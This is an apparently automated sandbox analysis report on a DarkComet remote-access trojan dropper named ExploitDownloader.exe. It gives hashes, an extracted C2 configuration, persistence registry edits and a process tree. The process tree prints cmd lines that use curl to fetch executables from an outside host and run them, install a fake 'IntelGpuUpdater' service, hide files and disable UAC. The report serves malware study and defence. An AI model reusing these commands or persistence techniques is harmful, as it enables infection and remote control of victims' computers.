Analysis
-
max time kernel
143s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2024 20:45
Static task
static1
Behavioral task
behavioral1
Sample
ExploitDownloader.exe
Resource
win7-20241010-en
General
-
Target
ExploitDownloader.exe
-
Size
27KB
-
MD5
d363863c21f0d453eaaa438f00027554
-
SHA1
7ba078266d3151068b500b9ce8cc4e579ad84a4a
-
SHA256
12eafe77459f406a8187cb7675249dfed1b214f47eff60d1291b42ed00c576e4
-
SHA512
1ff53e7a3f6eee3b99111a79bded3106fb809bd494b23839a5790a78f8b6baedbfaa707a16ceda481f93edde4d9b8bae06f12c444e16f7def5ce06f297f2bc37
-
SSDEEP
384:SsuozKPc0cDxRHXLRq418p/d6tVqQ4m9lHM1UopuJE5UjovhObRZUbjMUWDBVhIB:TLLIXTEs1Urjov4RScUWD7hq7W2e0W0
Malware Config
Extracted
darkcomet
Guest16
147.185.221.24:14161
RO_MUTEX-QFYD2RJ
-
InstallPath
MSDCSC\msdcsc.exe
-
gencode
scW2Kk9yHEWs
-
install
true
-
offline_keylogger
true
-
persistence
false
-
reg_key
GoogleDebugJ
Signatures
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\MSDCSC\\msdcsc.exe" test.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\MSDCSC\\msdcsc.exe,C:\\Windows\\TEMP\\MSDCSC\\msdcsc.exe" IntelGpuUpdater.exe -
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 5056 attrib.exe 3968 attrib.exe 400 attrib.exe 4304 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation test.exe -
Executes dropped EXE 7 IoCs
pid Process 2736 test.exe 3064 msdcsc.exe 4552 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3716 IntelGpuUpdater.exe 4172 msdcsc.exe 396 IntelGpuUpdater.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MSDCSC\\msdcsc.exe" test.exe -
resource yara_rule behavioral2/files/0x000b000000023b5f-2.dat upx behavioral2/memory/2736-3-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2736-42-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3716-53-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3716-88-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4172-90-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3064-92-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/396-94-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/396-110-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3064-111-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/396-112-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\IntelGpuUpdater.exe cmd.exe File created C:\Windows\IntelGpuUpdaterHelper.exe cmd.exe File opened for modification C:\Windows\IntelGpuUpdater.exe attrib.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 404 sc.exe 2448 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1544 3932 WerFault.exe 98 -
System Location Discovery: System Language Discovery 1 TTPs 32 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ExploitDownloader.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4472 timeout.exe -
Modifies data under HKEY_USERS 44 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software msdcsc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows msdcsc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion msdcsc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System msdcsc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" msdcsc.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000ac8da00a3244db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC msdcsc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\iWindowPosDX = "768" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000392a9e0a3244db01 IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\iWindowPosX = "26" notepad.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\iWindowPosY = "26" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000ac8da00a3244db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft msdcsc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad notepad.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fPasteOriginalEOL = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000006a63990a3244db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies msdcsc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\iWindowPosDY = "555" notepad.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fWrapAround = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000392a9e0a3244db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000ac8da00a3244db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fWindowsOnlyEOL = "0" notepad.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fMatchCase = "0" notepad.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000ac8da00a3244db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000ac8da00a3244db01 IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fReverse = "0" notepad.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ test.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe 3888 IntelGpuUpdaterHelper.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2736 test.exe Token: SeSecurityPrivilege 2736 test.exe Token: SeTakeOwnershipPrivilege 2736 test.exe Token: SeLoadDriverPrivilege 2736 test.exe Token: SeSystemProfilePrivilege 2736 test.exe Token: SeSystemtimePrivilege 2736 test.exe Token: SeProfSingleProcessPrivilege 2736 test.exe Token: SeIncBasePriorityPrivilege 2736 test.exe Token: SeCreatePagefilePrivilege 2736 test.exe Token: SeBackupPrivilege 2736 test.exe Token: SeRestorePrivilege 2736 test.exe Token: SeShutdownPrivilege 2736 test.exe Token: SeDebugPrivilege 2736 test.exe Token: SeSystemEnvironmentPrivilege 2736 test.exe Token: SeChangeNotifyPrivilege 2736 test.exe Token: SeRemoteShutdownPrivilege 2736 test.exe Token: SeUndockPrivilege 2736 test.exe Token: SeManageVolumePrivilege 2736 test.exe Token: SeImpersonatePrivilege 2736 test.exe Token: SeCreateGlobalPrivilege 2736 test.exe Token: 33 2736 test.exe Token: 34 2736 test.exe Token: 35 2736 test.exe Token: 36 2736 test.exe Token: SeIncreaseQuotaPrivilege 3064 msdcsc.exe Token: SeSecurityPrivilege 3064 msdcsc.exe Token: SeTakeOwnershipPrivilege 3064 msdcsc.exe Token: SeLoadDriverPrivilege 3064 msdcsc.exe Token: SeSystemProfilePrivilege 3064 msdcsc.exe Token: SeSystemtimePrivilege 3064 msdcsc.exe Token: SeProfSingleProcessPrivilege 3064 msdcsc.exe Token: SeIncBasePriorityPrivilege 3064 msdcsc.exe Token: SeCreatePagefilePrivilege 3064 msdcsc.exe Token: SeBackupPrivilege 3064 msdcsc.exe Token: SeRestorePrivilege 3064 msdcsc.exe Token: SeShutdownPrivilege 3064 msdcsc.exe Token: SeDebugPrivilege 3064 msdcsc.exe Token: SeSystemEnvironmentPrivilege 3064 msdcsc.exe Token: SeChangeNotifyPrivilege 3064 msdcsc.exe Token: SeRemoteShutdownPrivilege 3064 msdcsc.exe Token: SeUndockPrivilege 3064 msdcsc.exe Token: SeManageVolumePrivilege 3064 msdcsc.exe Token: SeImpersonatePrivilege 3064 msdcsc.exe Token: SeCreateGlobalPrivilege 3064 msdcsc.exe Token: 33 3064 msdcsc.exe Token: 34 3064 msdcsc.exe Token: 35 3064 msdcsc.exe Token: 36 3064 msdcsc.exe Token: SeAssignPrimaryTokenPrivilege 3716 IntelGpuUpdater.exe Token: SeLockMemoryPrivilege 3716 IntelGpuUpdater.exe Token: SeIncreaseQuotaPrivilege 3716 IntelGpuUpdater.exe Token: SeTcbPrivilege 3716 IntelGpuUpdater.exe Token: SeSecurityPrivilege 3716 IntelGpuUpdater.exe Token: SeTakeOwnershipPrivilege 3716 IntelGpuUpdater.exe Token: SeLoadDriverPrivilege 3716 IntelGpuUpdater.exe Token: SeSystemProfilePrivilege 3716 IntelGpuUpdater.exe Token: SeSystemtimePrivilege 3716 IntelGpuUpdater.exe Token: SeProfSingleProcessPrivilege 3716 IntelGpuUpdater.exe Token: SeIncBasePriorityPrivilege 3716 IntelGpuUpdater.exe Token: SeCreatePagefilePrivilege 3716 IntelGpuUpdater.exe Token: SeCreatePermanentPrivilege 3716 IntelGpuUpdater.exe Token: SeBackupPrivilege 3716 IntelGpuUpdater.exe Token: SeRestorePrivilege 3716 IntelGpuUpdater.exe Token: SeShutdownPrivilege 3716 IntelGpuUpdater.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3064 msdcsc.exe 4172 msdcsc.exe 396 IntelGpuUpdater.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5020 wrote to memory of 524 5020 ExploitDownloader.exe 84 PID 5020 wrote to memory of 524 5020 ExploitDownloader.exe 84 PID 5020 wrote to memory of 524 5020 ExploitDownloader.exe 84 PID 524 wrote to memory of 3980 524 cmd.exe 85 PID 524 wrote to memory of 3980 524 cmd.exe 85 PID 524 wrote to memory of 3980 524 cmd.exe 85 PID 5020 wrote to memory of 1812 5020 ExploitDownloader.exe 86 PID 5020 wrote to memory of 1812 5020 ExploitDownloader.exe 86 PID 5020 wrote to memory of 1812 5020 ExploitDownloader.exe 86 PID 1812 wrote to memory of 2772 1812 cmd.exe 87 PID 1812 wrote to memory of 2772 1812 cmd.exe 87 PID 1812 wrote to memory of 2772 1812 cmd.exe 87 PID 2772 wrote to memory of 4464 2772 cmd.exe 88 PID 2772 wrote to memory of 4464 2772 cmd.exe 88 PID 2772 wrote to memory of 4464 2772 cmd.exe 88 PID 2772 wrote to memory of 2736 2772 cmd.exe 89 PID 2772 wrote to memory of 2736 2772 cmd.exe 89 PID 2772 wrote to memory of 2736 2772 cmd.exe 89 PID 2772 wrote to memory of 4472 2772 cmd.exe 90 PID 2772 wrote to memory of 4472 2772 cmd.exe 90 PID 2772 wrote to memory of 4472 2772 cmd.exe 90 PID 2736 wrote to memory of 3924 2736 test.exe 91 PID 2736 wrote to memory of 3924 2736 test.exe 91 PID 2736 wrote to memory of 3924 2736 test.exe 91 PID 2736 wrote to memory of 3952 2736 test.exe 92 PID 2736 wrote to memory of 3952 2736 test.exe 92 PID 2736 wrote to memory of 3952 2736 test.exe 92 PID 3952 wrote to memory of 5056 3952 cmd.exe 95 PID 3952 wrote to memory of 5056 3952 cmd.exe 95 PID 3952 wrote to memory of 5056 3952 cmd.exe 95 PID 3924 wrote to memory of 3968 3924 cmd.exe 96 PID 3924 wrote to memory of 3968 3924 cmd.exe 96 PID 3924 wrote to memory of 3968 3924 cmd.exe 96 PID 2736 wrote to memory of 3064 2736 test.exe 97 PID 2736 wrote to memory of 3064 2736 test.exe 97 PID 2736 wrote to memory of 3064 2736 test.exe 97 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 3064 wrote to memory of 3932 3064 msdcsc.exe 98 PID 5020 wrote to memory of 1700 5020 ExploitDownloader.exe 104 PID 5020 wrote to memory of 1700 5020 ExploitDownloader.exe 104 PID 5020 wrote to memory of 1700 5020 ExploitDownloader.exe 104 PID 1700 wrote to memory of 2784 1700 cmd.exe 105 PID 1700 wrote to memory of 2784 1700 cmd.exe 105 PID 1700 wrote to memory of 2784 1700 cmd.exe 105 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 3968 attrib.exe 400 attrib.exe 4304 attrib.exe 5056 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ExploitDownloader.exe"C:\Users\Admin\AppData\Local\Temp\ExploitDownloader.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\SysWOW64\cmd.execmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "3⤵
- System Location Discovery: System Language Discovery
PID:3980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\cmd.execmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:4464
-
-
C:\Users\Admin\AppData\Local\test.exeC:\Users\Admin\AppData\Local\test.exe4⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\test.exe" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5056
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSDCSC\msdcsc.exe"C:\Users\Admin\AppData\Local\Temp\MSDCSC\msdcsc.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\SysWOW64\notepad.exenotepad6⤵
- System Location Discovery: System Language Discovery
PID:3932 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 2327⤵
- Program crash
PID:1544
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 54⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4472
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\cmd.execmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2784 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:3576
-
-
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/nssm.exe4⤵
- System Location Discovery: System Language Discovery
PID:4524
-
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4552
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc start IntelGpuUpdater4⤵
- System Location Discovery: System Language Discovery
PID:4076 -
C:\Windows\SysWOW64\sc.exesc start IntelGpuUpdater5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50004⤵
- System Location Discovery: System Language Discovery
PID:3660 -
C:\Windows\SysWOW64\sc.exesc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50005⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2448
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause2⤵
- System Location Discovery: System Language Discovery
PID:4400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3932 -ip 39321⤵PID:4360
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3888 -
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- System Location Discovery: System Language Discovery
